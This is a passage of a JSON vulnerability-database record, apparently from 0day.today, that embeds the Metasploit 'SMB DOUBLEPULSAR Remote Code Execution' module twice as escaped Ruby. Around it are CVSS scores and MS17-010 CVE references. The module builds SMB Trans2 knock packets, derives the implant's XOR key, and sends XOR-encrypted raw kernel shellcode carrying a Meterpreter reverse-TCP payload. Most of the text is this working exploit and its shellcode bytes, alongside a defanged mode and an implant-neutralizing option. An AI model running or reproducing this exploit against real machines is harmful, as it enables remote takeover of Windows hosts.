vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-22] #"}, "lastseen": "2021-09-22T06:19:54", "differentElements": ["sourceData"], "edition": 21}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "cbe618f8f646a702278f71d2c3dfeeaf", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-22T22:14:58", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27802"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:42030"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-22T22:14:58", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-22T22:14:58", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n 